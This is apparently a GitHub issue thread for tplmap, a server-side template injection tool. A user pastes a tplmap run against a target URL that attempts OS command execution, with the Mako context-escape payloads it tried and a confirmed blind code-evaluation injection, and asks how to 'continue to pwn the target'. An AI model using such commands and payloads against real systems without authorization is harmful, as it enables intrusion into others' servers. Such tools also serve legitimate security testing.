epinna / tplmap

Server-Side Template Injection and Code Injection Detection and Exploitation Tool
GNU General Public License v3.0

[-][checks] No system command execution capabilities have been detected on the target. #38

Closed its0x08 closed 6 years ago

its0x08 commented 6 years ago

Any idea on this?! How do I continue to pwn the target, or at least confirm that the vuln is not a false positive?!

root@kaLi:~/Desktop/scripts/tplmap# python tplmap.py -u 'https://www.target.com/category/movie*' --level 5 --os-cmd 'pwd' -e mako
[+] Tplmap 0.4
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if URL parameter 'url' is injectable
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin is testing </%block>*<%block> code context escape with 130 variations
[+] Mako plugin is testing </%text>*<%text> code context escape with 130 variations
[+] Mako plugin is testing blind injection
[+] Mako plugin is testing }* code context escape with 130 variations
[+] Mako plugin is testing %>*<%# code context escape with 130 variations
[+] Mako plugin is testing #\n*\n code context escape with 130 variations
[+] Mako plugin is testing </%def>*<%def name="t(x)"> code context escape with 130 variations
[+] Mako plugin has confirmed blind injection
[+] Tplmap identified the following injection point:

  URL parameter: url
  Engine: Mako
  Injection: </%def>*<%def name="t(x)">
  Context: code
  OS: undetected
  Technique: blind
  Capabilities:

   Shell command execution: no
   Bind and reverse shell: no
   File write: no
   File read: no
   Code evaluation: ok, python code (blind)

[-][checks] No system command execution capabilities have been detected on the target.

epinna commented 6 years ago

See #35.